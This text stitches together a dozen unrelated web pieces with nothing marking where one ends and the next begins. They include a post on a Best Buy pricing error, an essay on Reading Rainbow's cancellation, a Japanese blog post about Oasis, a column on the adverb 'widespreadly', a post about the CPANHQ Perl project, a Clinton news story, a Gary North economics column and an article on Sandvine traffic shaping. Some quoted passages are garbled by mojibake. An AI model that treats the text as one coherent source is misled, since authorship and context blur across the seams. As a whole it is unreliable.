It 'd be nice if they just admitted it was a screw up .
But oh well , the dream was fun while it lasted .
Interestingly , though the product page was fixed , with " Price : $ 1699.99 : Sold Out Online " posted in big fat red letters — it now looks to have been taken down completely .
If you successfully bought the TV at $ 10 — and have n't received a cancellation — post a comment below and fill us in .
Advertisement
Sometimes companies honor pricing mistakes to avoid bad PR , but this would have been a pricey mishap .
No surprise , though — Best Buy 's " Conditions of Use " fine print reads :
Errors on Our Site
Prices and availability of products and services are subject to change without notice .
Errors will be corrected where discovered , and Best Buy reserves the right to revoke any stated offer and to correct any errors , inaccuracies or omissions including after an order has been submitted and whether or not the order has been confirmed and your credit card charged .
If your credit card has already been charged for the purchase and your order is cancelled , Best Buy will issue a credit to your credit card account in the amount of the charge .
Individual bank policies will dictate when this amount is credited to your account .
If you are not fully satisfied with your purchase , you may return it in accordance with Best Buy 's Return Policy .
What the page had looked like :
Reading Rainbow is Dead
The pancakes will be ready in a little while .
Stop being such an irritating little shit .
Get your favorite stuffed animal and a blanket and huddle up in front of the television while you wait .
Blaze through all the channels looking for cartoons ; anything but news or sports .
Settle for PBS , as long as it is n't " This Old House . "
It is n't .
In fact , it 's ... it's ...
YESSSS !
OUTSTANDING !
Close your eyes if you want and listen to the lyrics and the psycho synth as you rise up on a gentle draft of joy : " Butterfly in the sky , I can go twice as highTake a look , it 's in a book - Reading Rainbow .
I can go anywhere !
Friends to know and ways to grow - Reading Rainbow .
I can be anything !
Take a look , it 's in a book - Reading Rainbow .
" Relax .
It 's all going to be okay for thirty minutes .
No one will try and sell you anything .
And you do n't have to take anybody 's word for it if you do n't want to .
We 're all moody , irascible , and opinionated here .
We 're all intractable artists .
Here , we 're readers .*** Never again .
Gone forever .
Did you hear the news ?
The Rainbow has evaporated .
The oil slick it shimmered on has dried up into the concrete .
No more butterfly .
No more LeVar Burton .
No more storybooks and pan-and - scan illustrations on PBS .
Did n't you hear ?
The money is in CGI .
The money is in math , computers , and phonics .
They ceased producing new episodes of Reading Rainbow in 2006 and now the show has been canceled completely , airing its last episode yesterday .
The show will have no replacement , neither functionally nor philosophically , and this is an intentional government policy .
The show has been taken off the air for political reasons .
For educational reasons .
Here 's NPR interviewing PBS content director John Grant , who explains why Reading Rainbow is going off the air " The show 's run is ending , Grant explains , because no one Ã ¢ÂÂ " not the station , not PBS , not the Corporation for Public Broadcasting Ã¢ÂÂ " will put up the several hundred thousand dollars needed to renew the show 's broadcast rights .
" Grant says the funding crunch is partially to blame , but the decision to end Reading Rainbow can also be traced to a shift in the philosophy of educational television programming .
The change started with the Department of Education under the Bush administration , he explains , which wanted to see a much heavier focus on the basic tools of reading Ã ¢ÂÂ " like phonics and spelling .
" Grant says that PBS , CPB and the Department of Education put significant funding toward programming that would teach kids how to read Ã ¢ÂÂ " but that 's not what Reading Rainbow was trying to do .
" Reading Rainbow taught kids why to read , " Grant says .
" You know , the love of reading Ã ¢ÂÂ " [ the show ] encouraged kids to pick up a book and to read .
" Yes , it did .
It certainly encouraged me .
And even if I did n't need encouragement , it lied to me , insisting that other kids across the country were also reading and loving books .
Even if all the kids in my Texas elementary school were slack - jawed cruel illiterates ( but good spellers ) , I saw that there were places in the world where kids were readers for the joy of it .
Critics .
Thinkers .
Malcontents .
Perverts .
People who made up their own minds about things and liked books just because they were fun .
Because nobody told you what to do or what to think in a book .
Reading did n't make you famous , or good , or smart .
But it made you feel less alone .
Maybe we were few and far between , us readers .
Maybe we still are .
But Reading Rainbow was our show , nonetheless .
Reading Rainbow was only half about books .
The rest of it was about all the other degenerate art forms , like dance , theater , sculpture , cartooning , and abstract painting .
The show 's host had an undeniable charisma : he was able to make anything look interesting , from visiting a box factory to baking bread overnight in a Manhattan kitchen .
He started with the fable .
The magic story .
And then he found the real - life inspiration .
And then , for perhaps the first time , you saw the magic there , too .
The magic of the box factory .
The magic of the night kitchen .
For want of a few hundred thousand dollars , the Rainbow is being painted out by the government .
There will be no one around to read to your kids while you work .
How much does a single F - 16 cost ?
How much does it cost to bury a Kennedy ?
I realize that Reading Rainbow probably does not carry the same impact with today 's children as it did for my generation .
But the spirit was the important thing , the spirit of art for art 's sake , for critical thought , for imaginative exploration and the permission to read books that did n't teach you anything .
Or taught you the wrong thing .
To question .
To be strong .
To be anything and do anything .*** Here 's Run DMC rapping about growing up , going to school , minding your mamma , and reading books :
Here 's a song about teamwork that I did n't even know was totally hardwired into my soul until I watched it again and remembered why I expect other people around me to work as hard as I do :
Here 's a segment about putting on makeup and being in the Broadway version of CATS :
Here 's a whole episode about kicking ass , about how books teach you how to kick ass , and about never giving up : Part one : Part two : Part three :*** I do n't have several hundred thousand dollars .
If I did , I would cut a quiet check to keep this program on the air .
I do n't have several million dollars .
If I did , I would start producing new episodes .
When I was little , B. Dalton Booksellers funded Reading Rainbow .
In the 90s , Barnes and Noble used to pay for Reading Rainbow until they cut funding for it in 2001 .
After that ?
No one .
Slow grinding attrition .
HEY AMAZON !
HEY GOOGLE !
WANT TO SELL MORE KINDLES ?
WANT TO GET THE JUSTICE DEPARTMENT OFF YOUR BACK ?
HOW ABOUT A LITTLE SOMETHING FOR THE KIDS ?
I was one of the lucky ones , I guess .
I got to watch and enjoy Reading Rainbow while it was still around , whereas the children of the future will never have the chance .
I wonder what they will miss .
I wonder what publishing will do without a generation of children that sees nothing in books but a goddamn grammar lesson .
I fear for the future .
But I am not without hope .
In many ways , " The Fiction Circus " is Reading Rainbow for adults and manages to survive without any public funding or any revenue at all , actually .
A group of nice people , with children , could do what we do for children , and they could probably get a grant for it .
Reading wo n't disappear without Reading Rainbow , and neither will the spirit that the show inspired and encouraged .
But the world will be a little less colorful without this show on our public television stations .
The show did n't just teach kids to observe and mimic .
It taught kids to excel , to stretch themselves beyond the limits of what they observed .
That 's what that opening line means , you know .
About the butterfly .
God 's butterfly is a goddamn weakling .
If you want , you can go twice as high .
And that 's still true , you know , with or without Reading Rainbow .
But it was the one message on public television worth paying for .
Who Causes Cyclists ' Deaths ?
More than 52,000 bicyclists have been killed in bicycle traffic accidents in the U.S. over the 80 years the federal government has been keeping records .
When it comes to sharing the road with cars , many people seem to assume that such accidents are usually the cyclist ’s fault — a result of reckless or aggressive riding .
But an analysis of police reports on 2,752 bike - car accidents in Toronto found that clumsy or inattentive driving by motorists was the cause of 90 percent of these crashes .
Among the leading causes : running a stop sign or traffic light , turning into a cyclist ’s path , or opening a door on a biker .
This should n’t come as too big a surprise : motorists cause roughly 75 percent of motorcycle crashes too .
[ % comments ]
Warning : Video contains strong language .
A good example of why dangling your goods above a lit fireworks rocket is a very , very BAD idea .
まさに突然の脱退宣言だったわけだが、この兄弟の仲の悪さは昔からのことで、少し前から解散説が英国プレスをにぎわせているという話を聞いても毎度のことじゃないかとたかをくくっていた。
で、この破局を受けて、正直別にどうとも思っていないワタシがいる。オアシスのアルバム全部持ってるのに。
これは以前書いたことがあるが、ワタシはぼんくらリアムが数曲で退場し、残りはノエルが仕方なく歌った2000年の福岡公演の目撃者だったりする。あれはワタシの黒歴史的勲章だが、あのときこの上なく生気の無い
" Live Forever " を聴いた時点でオアシスを見限るべきだったのだ（その数年後に再び福岡公演で兄弟喧嘩の末リアムが退場したという話を聞いたときは腹を抱えて笑ってしまった）。
結局この10年、ファーストやセカンドの輝きをノエルに期待し続け、もちろん優れたアルバムはあったけど、結局期待が満たされることはなかった。
現時点での最新作 『Dig Out Your Soul』が出たときやたらと激賞する声が多かったので期待してしまったが、あれはワタシには純粋に「ダメなオアシスのアルバム」に聞こえた。
まぁ、ワタシ自身彼らの良い聴き手でなくなったということだろう。オアシスがこの後どうなるかは知らないが、ぼんくらリアムしかいないバンドには興味はない。
For today 's Mailbag Friday , we hear from Barbara Z. of Norfolk , VA .
She writes : " On the radio I was listening to the beginning of " The Thomas Jefferson Hour " in which Clay Jenkinson speaks as if he were Jefferson .
I heard him say the following :
' I happen to live in the first great era when books were widespreadly available ...'
" Widespreadly ?
That one is new to me ! "
Mr. Jenkinson 's impersonation of Thomas Jefferson is an impressive feat .
He holds forth extemporaneously as if Jefferson had time - warped to the present day , and since Jefferson was known as a voracious polymath , he covers a diverse range of topics .
( Past shows are archived here .
The sentence above occurs in Show 731 , " Influential Books , " but you can also hear Jenkinson - as - Jefferson muse on everything from terrorism to Greek and Latin . )
Historical reenactors are always careful to avoid committing anachronisms .
We would n't want to see a role - player at Colonial Williamsburg whipping out an iPhone , for instance .
( A recent episode of " South Park " lampooned the earnest authenticity of reenactors who never break character . )
But Jenkinson 's use of widespreadly was not an anachronistic modernism put into the mouth of Jefferson .
Nor was it a genuine lexical artifact of the Jeffersonian era that he salvaged for the occasion .
As best as I can tell , widespreadly would have sounded just as odd two centuries ago as it does now .
There are actually some adverbs ending in - ly that were acceptable in early modern English but are no longer considered standard .
Take adjectives that already end in - ly , like friendly , manly , costly , and deadly .
If you used friendlily , manlily , costlily , or deadlily now , most people would look at you funny .
But that was n't always the case .
As the Oxford English Dictionary explains in its entry for -ly :
It was , down to the 17th c. , somewhat frequently attached , with this function , even to adjs .
in -ly , as earlily , godlily , kindlily , livelily , lovelily , statelily ; but these formations are now generally avoided as awkward , while on the other hand it is felt to be ungraceful to use words like godly , goodly , lovely , mannerly , timely , as advs . ; the difficulty is usually evaded by recourse to some periphrastic form of expression .
Periphrastic , the VT tells us , means " roundabout and unnecessarily wordy . "
But really , we 're being necessarily wordy when we say " in a friendly manner / way / tone " instead of friendlily , since the single - word form has been " blocked " by the - ly ending already present on the adjective .
Similarly , Jenkinson could only have rephrased his sentence to avoid widespreadly , changing it to " ... when books were available on a widespread basis , " or simply " ... when books were widely available . "
( Nothing too roundabout about that . )
So why does widespreadly sound wrong to most speakers of American or British English ?
( It may be acceptable in other varieties of World English ; a search on Google Scholar , for instance , turns up hundreds of examples from writers in Asia and elsewhere , though many of them may be non-native speakers of English . )
It has to do with the composition of the adjective widespread , which combines the modifier wide with the past participle spread .
Spread is one of those irregular verbs where the past participle is the same as the base form , like burst , come , hurt , run , shut , and split .
Other irregular verbs have less predictable past participial forms ; they often end in - en or -n , like shave - shaven or grow - grown , but sometimes the vowel sound in the base form is changed , like wear - worn or speak - spoken .
Regular verbs , meanwhile , form their past participles simply by adding - ed or -d , and we seem to be much better at creating adverbs from them : think of doggedly , excitedly , half - heartedly , mean - spiritedly , pointedly , and unexpectedly .
Try to make an adverb out of an irregular past participle , or a compound adjective ending in one like widespread , and you 're asking for trouble .
Ill - advisedly , ill - naturedly , and ill - temperedly all sound fine , but ill - bredly , ill - chosenly , or ill - shapenly ?
Not so much .
As with widespread , we have to resort to periphrastic measures to express these words adverbially , like " in an ill - bred manner " or " in an ill - chosen fashion . "
The amazing thing is that native English speakers know rules like this one without ever having been taught them explicitly .
It 's all part of English morphology , or the internal structure of words .
So what happened to Clay Jenkinson 's morphology ?
I think it was just a speaking error : he was probably juggling " books were widely available " and " books were widespread " and came up with a blended version , " widespreadly available . "
Such slip - ups happen even to the most careful speakers of English .
I bet they even happened to Thomas Jefferson .
Do you have your own question about the history of a word or phrase that you 'd like to have discussed in a future Mailbag Friday ?
Click here and let us know !
shlomif_tech
[ shlomif ]
Limbic Region recently wrote a post on his use Perl journal titled " Improving search.cpan.org ( Advanced Search ) " .
The post concludes by saying that " Feel free to add your own [ ideas ] - I know someone who may actually be motivated to implement some of them as an alternate to search .
cpan.org is reading :-) " .
Since I talked with L~R about CPANHQ , a seacrch .capn.org alternative in question , that I have been contributing to , I can assume meant me .
Before I reply to L~R 's points , let me introduce CPANHQ .
As documented in the first and only wiki page it has so far ( which I wrote two days ago ) , " CPANHQ aims to be a community - driven , meta - data - enhanced alternative to such sites as http://search.cpan.org/ and http://kobesearch.cpan.org/.
Currently , the functionality is very basic , but we have great ambitions . "
I learned about CPANHQ by overhearing a conversation on Freenode 's #perl channel .
I joined the effort , and made several enhancements to the Catalyst and DBIx - Class - based code , which was a useful learning experience .
The functionality is still very basic , and there 's a lot of work to do , so any help would be appreciated .
Just fork the github repository ( or my repository , which I tend to keep somewhat more up - to - date ) , and play with the code .
Now back to L~R 's suggestions .
At first I was a bit sceptical of them and they seemed like an overkill , and not really useful .
When I 'm using search .cpan.org to search for a distribution , either I know the name of the module that I 'm looking for and just perform a search to be directed to the location of the exact page , or I usually find the order of the search sufficient for my needs .
However , on a second reading , it seems like what Limbic suggests ( like being able to sort results by Kwalitee , creation date , number of downloads , last update date , rating , etc. , providing a code search , or recommendations ) actually has some merit and should be considered .
One thing I 'm sure about is that the default CPAN search should remain simple , while only giving an option for an advances search using a different form , where it might be possible to formulate a more complex query using a specialised language .
Otherwise , if we complicate the existing search , it could prove confusing to many users .
L~R 's suggestions remind me of my CPAN Module - Rank thought experiment , that aimed to define an automatically calculated metric for the relevance of CPAN modules .
L~R later referred me to a post to Perlmonks.org titled " Advanced CPAN Search ? " where someone asks a similar question .
To sum up , please consider monitoring or even contributing to CPANHQ if you want to improve the future of finding stuff and interacting with CPAN .
It seems that some people have issue with the current CPAN search state - of - the - art , and would like to see it improved .
We'd be happy to hear what you think .
Hillary Clinton 's trouble - prone African odyssey threw up more controversy last night when she appeared to equate US democracy with Nigeria 's corrupt election system .
Speaking in Nigeria , the latest stop on her multicountry tour , the US secretary of state said that Nigeria had troubles with its elections but so too did the US , citing the example of the 2000 Florida recount .
But she went further by singling out Jeb Bush , the Republican governor of Florida at the time and brother of the party 's candidate George Bush .
The Republicans eagerly jumped on her remarks last night , saying her trip had been full of gaffes and expressed hope she would go to Africa more often .
Clinton , in the capital Abuja , told an audience of civil activists that Nigeria 's election system was flawed and " lack of transparency and accountability has eroded the legitimacy of the government and contributed to the rise of groups that embrace violence and reject the authority of the state " .
But she went on to draw a parallel with the US .
" Our democracy is still evolving .
You know we had some problems in some of our presidential elections .
As you may remember , in 2000 our presidential election came down to one state where the brother of one of the men running for president was governor of the state .
So we have our problems too . "
The Republicans will seek to exploit Clinton 's comparison of the US elections with those on an African state and for breaking the convention that leaders do not criticise fellow domestic politicians while abroad .
The Democrats claim that George Bush stole the election from Al Gore in Florida but the Republicans insist that the recounts were fair .
Terry Holt , a Republican strategist , told CNN that Clinton had had quite a string of gaffes on the Africa trip .
" I hope she goes to Africa more often , " he said .
But James Carville , a former adviser to President Bill Clinton , said : " There is not a single thing that is in dispute .
There has to be a time when the secretary of state speaks the truth . "
The latest row of her seven - country trip came only two days after an outburst in which she turned on a student in the Democratic Republic of Congo who asked her for Bill Clinton 's views on the country 's politics .
She gave a terse reply , saying she was secretary of state and could give her own opinions .
Afterwards , it was reported that the student 's question had been mistranslated and that he had meant to ask about Barack Obama 's views of the country .
But the state department yesterday said this was untrue and the student had simply been nervous and had meant to ask about Obama 's views but raised Bill Clinton instead .
The start of Hillary Clinton 's trip was overshadowed by her husband 's dramatic rescue mission to North Korea to bring home two US journalists who had been held captive since early this year .
The state department stood by Clinton 's comments about elections , saying that she made the comparison to stress that , in spite of the arguments in 2000 , there had been a peaceful transfer of power .
" The point she is making is that it 's about a disputed result and then the willingness of the candidates to accept a flawed result rather than , say resort to violence , " PJ Crowley , a state department spokesman , said .
Clinton praised the 2008 US election as an example of how democracy should work .
" I know a little bit about running elections and I have won some elections , and , I have lost some elections , " she said .
She pointed to her loss to Obama , and the subsequent joining of his administration , as a way forward for Nigeria 's next general election .
" In my country the man that I was running against and spent a lot of time and effort to defeat , asked me to join his government .
So there is a way to begin to make this transition that will lead to free and fair elections in [ Nigeria in ] 2011 , " Clinton said .
She is due to leave Nigeria today for Liberia and end her trip in Cape Verde .
UPDATE : The GOP is also coming up with amendments to short - circuit the lifting of the ban .
This really came out of nowhere .
Yesterday , we had AIDS activists quite literally close down the US Capitol Rotunda to protest President Obama ’s request to Congress to keep the federal ban on needle exchange in place ( Obama had promised during the election to help lift the ban , but in his budget this year asked Congress to keep it ) .
Today , we have the mark - up of the House Labor - HHS Appropriations bill , and in it is a repeal of the needle exchange ban .
( The CDC , WHO , NIH and President Clinton ’s Surgeon General all found that needle exchange programs decrease the spread of HIV . )
Was this in response to the protests yesterday ?
I suspect a bit of yes and a bit of no .
House Speaker Nancy Pelosi has been dogging this issue ( for the good guys ) for 14 years now .
So this is a priority for the Speaker .
But this news , coming on the heels of the protests , sure suggests that they had an impact .
And good for them .
And good for the Speaker .
A lesser politician would say “ you know , I want to include needle exchange in the mark - up , but because of the protests we have to take it out , or else we ’ll look like we caved to public pressure . ”
Pelosi , on the other hand , just went ahead with the policy change because it ’s the right thing to do .
The House has now presented the Obama administration with a perfect opportunity to show leadership .
In explaining why the president asked Congress to continue the ban in his most recent budget , an administration spokesman said :
“ We have not removed the ban in our budget proposal because we want to work with Congress and the American public to build support for this change , ” he said .
I ’m happy to take that statement at face value .
What ’s the administration ’s plan for working with Congress to get the votes in the full House , and to get the needle exchange ban on the docket , and passed , in the Senate ?
Here ’s that protest again :
[ youtube=http://www.youtube.com/watch?v=709lhb9dzkE]
Recently by Gary North : Hit-and - Run : How the Government ’s Billion - Dollar Cash for Clunkers Boondoggle Hurts the Poor
I do n’t know when the term “ pink slip ” originated .
The term is at least a century old .
It refers to a “ you ’re fired ” notice .
The American economy shows no signs of reversing its relentless increase in the rate of unemployment .
Jobs are disappearing at a rate not seen since the 1981 — 82 recession .
Companies continue to cut costs by laying off workers .
This is the main source of the increase in corporate earnings — not increased output , but decreased output .
How is this profitable ?
Because of increased output per surviving worker .
In the midst of recession , businesses are learning how to cut costs .
Labor in most businesses is the # 1 cost .
Cut labor , and you cut costs faster than by cutting anything else .
Workers see what is happening .
They are working harder because they are facing pink slips .
To understand how bad things are today , and how much worse they are likely to get , we need to survey some ancient history .
RECESSIONS AND UNEMPLOYMENT
In the Reagan years , the recession was a secondary recession .
The initial recession took place in Carter ’s final year in office , 1980 .
The recession was one of the reasons for his defeat .
The cause was clear : the Federal Reserve had decreased the rate of monetary inflation .
First in Nixon ’s recession ( 1969 — 70 ) , then in Ford ’s recession ( 1973 — 75 ) , the Federal Reserve responded by pumping up the money supply .
Nixon took the nation off the international gold standard on August 15 , 1971 .
This removed any external pressure on the FED ’s expansion of money .
G. William Miller , who lasted a year and a half under Carter , oversaw a serious expansion of money , which was translated into prices by way of a series of OPEC oil price hikes in 1979 .
This seemed like a replay of the crisis of 1973 .
Carter persuaded Miller to resign in August of 1979 .
He gave him the figurehead office of Secretary of the Treasury .
He replaced Miller with Paul Volcker .
Volcker and the Board of Governors decided that the only way to call a halt to escalating prices and rising interest rates was to reduce the FED ’s purchase of assets .
Volcker announced the new policy in October .
The FED would let the federal funds rate rise .
It would let all other rates rise .
Rates rose .
The bank prime rate rose .
It hit an unprecedented 20 % in April 1980 .
This was the mid-point of Carter ’s six - month recession .
The rate backed off to 11 % in late July .
Technically , the recession was over .
But then the rate started climbing again .
It reached 21.5 % in mid-December .
It was at 20.5 % the following July .
It slowly declined , but did not reach 9.5 % until June 1985 .
The economy tanked .
It could not survive on a prime rate anywhere near 20 % .
Volcker was determined to wring price inflation out of the economy , and he did .
Price inflation continued upward .
It hit 13.5 % in 1980 .
It took time for the FED ’s policy to effect a reversal .
The price of slowing prices was a rising unemployment rate .
It hit 10.8 % in December 1982 .
The recession had ended the previous month .
The unemployment rate fell to 8 % a year later .
This is regarded as “ one of the most dramatic recoveries since employment and unemployment statistics have been collected .
. . . ” ( Bureau of Labor Statistics . )
Price inflation also fell rapidly .
It was down to 3.2 % in 1983 .
No one had predicted such a rapid decline .
Unemployment declined more slowly .
It was down to 7.2 % in November 1984 .
Reagan was re-elected by a landslide .
The economy recovered .
The stock market boomed from its bottom at 777 on August 13 , 1982 .
The Reagan recession was unique in its intensity .
It came in response to the most serious U.S. price inflation of the peacetime 20th century .
The solution was to slow the rate of monetary inflation , which caused the highest short - term interest rates of the 20th century .
The recession was severe , but the recovery was rapid .
There was one more recession in the 20th century : July 1990 to March 1991 .
It cost President Bush the election .
James Carville ’s slogan carried the electorate for Clinton : “ It ’s the economy , stupid . ”
Yet the election was in November 1992 .
The recovery was still barely visible 20 months after the recession officially ended .
When the 1990 recession began , unemployment was under 6 % .
It rose to 7.5 % in mid-1991 , when the recession technically ended ( a retroactive assessment by the NBER ) .
It continued upward .
In mid-1992 , it was about 8.2 % .
It was still at 8 % by the time of the election .
This is typical .
The recession ends , but unemployment keeps climbing .
This was also true of the 2001 recession .
See the chart .
WHAT WE CAN EXPECT
The economy is not in recovery mode .
The best news that the media can present is that the rate of contraction is slowing .
There is no good news on the unemployment front .
The rate keeps climbing .
The statisticians have this hope : the job market will get so bad that workers presently looking for jobs will drop out .
If they stop looking for jobs , they are removed from the unemployment statistics .
Unemployment refers to people out of work who are looking for jobs .
So , when someone drops out of the job market , he lowers the rate of unemployment .
If enough people quit looking , the statistic looks better .
Then there is the underemployment factor .
This is getting some attention , but not enough .
Businesses have cut workers ’ hours .
They do n’t want to lose workers , since there are costs of firing , such as an increase in the firms ’ state unemployment insurance rate .
There might even be a lawsuit for discrimination .
Then there are re-hiring issues .
It takes time to screen applicants .
It takes time to re-train new workers .
It is better to keep old workers , but cut their hours .
This is being done on a massive scale .
The numbers are grim .
An estimate by Federal Reserve Bank of Cleveland is this : the number of total involuntary part - time workers has increased by five million , April 2006 ( low point ) to March 2009 .
It is likely higher today .
Wage demands from workers are nonexistent .
This puts downward pressure on wage rates .
Full - time workers know that there are part - timers in the company who would be happy to return to full - time work .
There is great fear of being fired today .
The economy will recover at some point .
But then we face the problem of the secondary recession .
As the Alt - A mortgages come due next year and through 2011 , the number of foreclosures will rise .
It is now estimated that half of Americans who have mortgages will be underwater in 2011 .
The post -2001 recovery was driven by the FED ’s monetary policies .
These policies stimulated growth by lowering mortgage rates and creating the housing bubble .
That bubble is now long gone .
As housing continues to decline as a result of Alt - A and option ARM mortgage re-sets , the economy will need to find another source of expansion .
Today , no one seems to know what that next bubble - driven sector will be .
Without it , the zero- interest policies of the Federal Reserve will not gain traction .
But with it , the economy will face a replay of the Greenspan bubble - bust scenario .
An echo recession will likely appear even before the unemployment rate turns down .
The lag time looks sufficiently long that it will overwhelm any recovery , which will be weak .
This assumes that there will be a strong leading sector to revive the public ’s faith in economic growth .
There may not be .
WORSE NEWS ON THE HOUSING FRONT
Banks are not lending .
They are keeping money with the FED as excess reserves .
The bankers know that the next wave of residential real estate loan re-sets will hit next year .
Commercial real estate is also going to fall .
Vacancy rates are up .
No one expects a near - term reversal .
This raises doubts about bank solvency .
There are over 300 banks on the FDIC ’s problem list .
This is probably a low - ball estimate by the FDIC .
The bankers do not want to lend to high - risk borrowers .
They keep their money at the FED because they see no borrowers .
This includes the U.S. Treasury .
They could buy safe 2 - year T - bonds and lock in 1.2 % .
This is ten times what they are paid by the FED .
They refuse .
Will they lend to mortgage holders who are facing the re-set problem ?
Of course not .
The price of real estate is unlikely to rise .
The underwater mortgages are rising .
The borrowers will want to borrow the money they paid for their homes .
They want a rollover .
But their homes are worth 20 % less or more , depending on where they live .
In the re-set states of California , Nevada , Florida , and Arizona , homes are down 40 % or more .
The bankers will not roll over these loans at face value .
Then what ?
If they evict these people , they will have to register the losses .
They want to avoid that .
But the re-sets are legally required .
How can the people facing a re-set crisis get the money they need to roll over their loans ?
They will need to come up with cash to make up the difference between the loans ’ face value and the houses ’ resale value .
These people do not have cash to do this .
The re-sets will not be re-set .
The lenders will face walkaways .
Not that many home owners have enough savvy to keep paying on the mortgages , on the assumption that the lenders will not foreclose .
All talk about a housing recovery should include a detailed explanation of how lenders will be willing and able to roll over these mortgages .
The talk should also include an explanation of how the lenders can get away with counting defunct loans — loans that have not been re-set as the agreement requires — as not really defunct , and therefore can be legally carried on the books as good loans at face value .
These are not big bank loans .
Little banks cannot exchange these loans with the FED at face value for T - bills .
That benefit was available only to the big banks .
THE PINK SLIP ECONOMY
The manufacturing sector in July was still in negative territory , according to the Institute for Supply Management : 49 .
But this was up 4 percentage points since June : a substantial one - month increase .
This is good news , even though anything under 50 is contracting .
The non-manufacturing sector got worse .
It was at 46.4 , down six - tenths of a percentage point from June .
The non-manufacturing sector is far larger than manufacturing in terms of its impact on the labor market .
It employs almost 90 % of the work force .
Manufacturing employs 11 % of the labor force , down from 20 % in 1979 ( 2006 figures ) .
The economy is still contracting .
The hope is that it will reverse later this year .
Bernanke has said it will .
Geithner has said it will .
But both have said it will be a weak recovery .
Geithner has said that unemployment will peak in 2010 .
He did not say when in the year .
This indicates that he understands the lag factor .
We are seeing the worst unemployment rate since 1982 .
Tens of millions of workers have no memory of that era .
They have borrowed and spent on the assumption that nothing like this could happen to them .
But it has .
The new psychology is one of caution .
Even people who are older and in safer , high - responsibility positions know that their employers are facing severe pressures .
Entire industries aimed at the consumer , especially those tied to housing and finance , are in a crisis worse than any seen since the end of World War II .
Whether this has hit younger workers is not clear yet .
The ones under 30 have bounced around for a decade .
This age group has not found careers .
They are still insecure .
This recession makes things very bad for recent college graduates , but the ones a decade older have not enjoyed stability anyway .
The workers above 35 , with families and mortgages , are taking heavy hits .
Their career plans have been upended by the severity and duration of this recession .
The one bright spot was their homes .
They were appreciating .
Now these families are underwater .
The Reagan recession had been preceded by a decade of inflation .
The energy markets were out of joint .
The unemployment rate went up fast , but then came down fast .
Interest rates fell .
The economy recovered as a result .
The stock market rose for 18 years , except for 1987 ’s brief crash .
The 1980 ’s generally are regarded as boom years , despite 1980 — 82 .
People who came into the work force in 1982 and later have never faced anything like this .
They have planned their lives in terms of a world that is gone .
In 1982 , there was a boom ahead .
Interest rates were high because of price inflation , 1968 — 82 .
When rates fell , there was a boom .
Now rates are lower than ever before , and prices are stable .
Banks are not lending .
Real estate is depressed .
A bubble market does not recover rapidly .
It takes years .
Think of gold at $ 850 in 1980 and $ 256 in 2001 , despite a doubling of the price level .
Where will recovery come from ?
What will be the boost comparable to falling interest rates after 1981 ?
There will be none .
Then where will the jobs come from that will roll back unemployment at 9.5 % today and heading higher ?
Where will people find a career at age 35 that will not suffer from the wage pressures from younger workers who finally settle down in career paths ?
Oldsters will retire if they hate their jobs and if their homes are paid off .
But that hope is fading for anyone under 55 .
The pink slips will increase .
The wage pressure will increase .
A new economy has appeared , one busted by the attempt of Greenspan and Bernanke to come down from the monetary inflation and low rates of 2001 — 2004 .
That attempt blew up in Bernanke ’s face .
CONCLUSION
Bankers see what is coming : more defaults , more real estate declines , more foreclosures , and more write - downs .
They remain in paralysis mode .
The economy has been hollowed out by monetary inflation , followed by a sharp decline in output .
Demand is low .
Caution is at the forefront .
Businesses are not going to hire new workers when things turn up .
They are going to add hours to the workers who are still on the payroll .
The effect on the work force is going to be the Keynesian ’s nightmare : a recovery without increased spending .
They will demand more Federal deficits .
They will demand another stimulus .
The government will absorb more investment dollars .
The government will crowd out the private sector .
Recovery without new capital ?
It ’s not possible .
We now live in pink slip nation .
We will live in it for a long time .
Gary North [ send him mail ] is the author of Mises on Money .
Visit http://www.garynorth.com.
He is also the author of a free 20 - volume series , An Economic Commentary on the Bible .
Copyright © 2009 Gary North
The Best of Gary North
In our globalized , post - industrial world , a single Canadian company can shape the Internet experience for 20 percent of the world 's wireline broadband users .
Sandvine makes deep packet inspection hardware that can identify and then block , shape , degrade , fold , spindle , or mutilate user traffic coming from particular applications such as Skype or BitTorrent clients .
The 160 worldwide ISPs who use the company 's products love this particular capability so much that a full 90 percent of them employ it to " manage " their networks in a discriminatory way .
According to the company , these 160 ISPs serve 20 percent of the world 's wireline broadband connections .
If 90 percent of the ISPs shape traffic by application , Sandvine equipment alone may be responsible for the application - specific discrimination that 18 percent of world wireline broadband users face — and that figure says nothing about all the other ISPs who use similar products from other vendors .
If you thought that network neutrality was some kind of default position for the worldwide Internet , think again .
Let 's innovate
In Sandvine 's view , the only appropriate way to handle traffic shaping is to not regulate it — though governments can step in after the fact if there are egregious attacks on competition .
Sandvine made its revelations in a recent filing to Canadian regulators ( read them all ) as part of that country 's ongoing network management proceeding .
In essence , telecoms regulator CRTC wants to know whether Canada needs network neutrality guidelines .
Final comments were due last week , and Sandvine took the opportunity to point out that discriminatory traffic shaping is already hugely popular around the world .
Everybody 's doing it !
" As a result of the different demands placed on a network by various applications and the differences in subscribers ’ expectations of service quality between applications , most of Sandvine ’s customers have adopted some form of application - specific ITMPs [ Internet traffic management ] , " wrote the company .
And do n't think it 's not happening in the US , either , despite the smackdown Comcast received last year from the FCC for just this sort of behavior .
" Sandvine estimates that approximately 90 % of its 160 customers , which span 70 countries , use some form of application - specific traffic management policies , including most of its customers in the United States . "
If Canadian ISPs were n't able to use the same tools everyone else used , they might be at a disadvantage .
In Sandvine 's view , the only appropriate way to handle traffic shaping is to not regulate it — though governments can step in after the fact if there are egregious attacks on competition .
Why can't minimal upfront regulation work ?
Because ISPs must be able to innovate .
" Nobody predicted the impact of P2P filesharing before it occurred , " says the company 's filing .
" What kinds of demands will the mass adoption of applications like High - definition YouTube and Slingbox , which ' slings ' TV signals to fixed line and wireless Internet devices , place upon the network ?
And what policies will be best to deal with them ?
We do n’t yet know .
Again , experimentation will be required . "
The obvious rejoinder to this is : no one knows , but it does n't matter .
Limit people 's Internet usage when necessary in a nondiscriminatory way and let them choose what applications to run and when to run them .
Congestion can be alleviated by 1 ) building out capacity , 2 ) using data caps , and 3 ) throttling heavy users at peak times without regard to their content or applications .
These are the steps taken by Comcast in response to the FCC , and they 've led to few complaints .
Even Sandvine admits that nondiscriminatory throttling and user control are the future .
" As a future step we see subscribers choosing their own ITMP traffic priorities ; however , commercialization of this solution is still in progress .
Halting this roadmap through a guideline that precluded application - specific policies would have a chilling effect on innovation and the future quality of the Internet experience for Canadian users . "
Good for them , though that last bit does n't make much sense ; such a policy would quite obviously spur the innovation in subscriber - oriented throttling choices that Sandvine says it is already working on .
Not everyone is down with the customer - focused approach , however .
Bell Canada reminded the CRTC of its own ( largely toothless ) proposed guidelines for traffic shaping .
